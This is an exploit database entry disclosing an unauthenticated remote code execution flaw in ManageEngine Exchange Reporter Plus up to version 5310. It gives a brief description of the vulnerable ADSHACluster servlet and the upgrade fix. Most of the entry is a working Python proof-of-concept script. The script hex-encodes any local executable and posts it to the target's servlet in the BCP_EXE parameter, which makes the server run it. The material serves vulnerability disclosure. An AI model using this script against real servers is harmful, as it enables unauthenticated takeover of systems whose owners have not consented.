ManageEngine Exchange Reporter Plus 5310 Remote Code Execution

2018.07.04
Credit: Kacper Szurek
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: ManageEngine Exchange Reporter Plus <= 5310 Unauthenticated RCE # Date: 28-06-2018 # Software Link: https://www.manageengine.com/products/exchange-reports/ # Exploit Author: Kacper Szurek # Contact: https://twitter.com/KacperSzurek # Website: https://security.szurek.pl/ # YouTube: https://www.youtube.com/c/KacperSzurek # Category: remote 1. Description Java servlet `ADSHACluster` executes `bcp.exe` file which can be passed using `BCP_EXE` param. https://security.szurek.pl/manage-engine-exchange-reporter-plus-unauthenticated-rce.html 2. Proof of Concept ```python import urllib file_to_execute = "calc.exe" ip = "192.168.1.105" def to_hex(s): lst = [] for ch in s: hv = hex(ord(ch)).replace('0x', '') if len(hv) == 1: hv = '0'+hv lst.append(hv) return reduce(lambda x,y:x+y, lst) print "ManageEngine Exchange Reporter Plus <= 5310" print "Unauthenticated Remote Code Execution" print "by Kacper Szurek" print "https://security.szurek.pl/" print "https://twitter.com/KacperSzurek" print "https://www.youtube.com/c/KacperSzurek" params = urllib.urlencode({'MTCALL': "nativeClient", "BCP_RLL" : "0102", 'BCP_EXE': to_hex(open(file_to_execute, "rb").read())}) f = urllib.urlopen("http://{}:8181/exchange/servlet/ADSHACluster".format(ip), params) if '{"STATUS":"error"}' in f.read(): print "OK" else: print "ERROR" ``` 3. Solution: Update to version 5311 https://www.manageengine.com/products/exchange-reports/release-notes.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top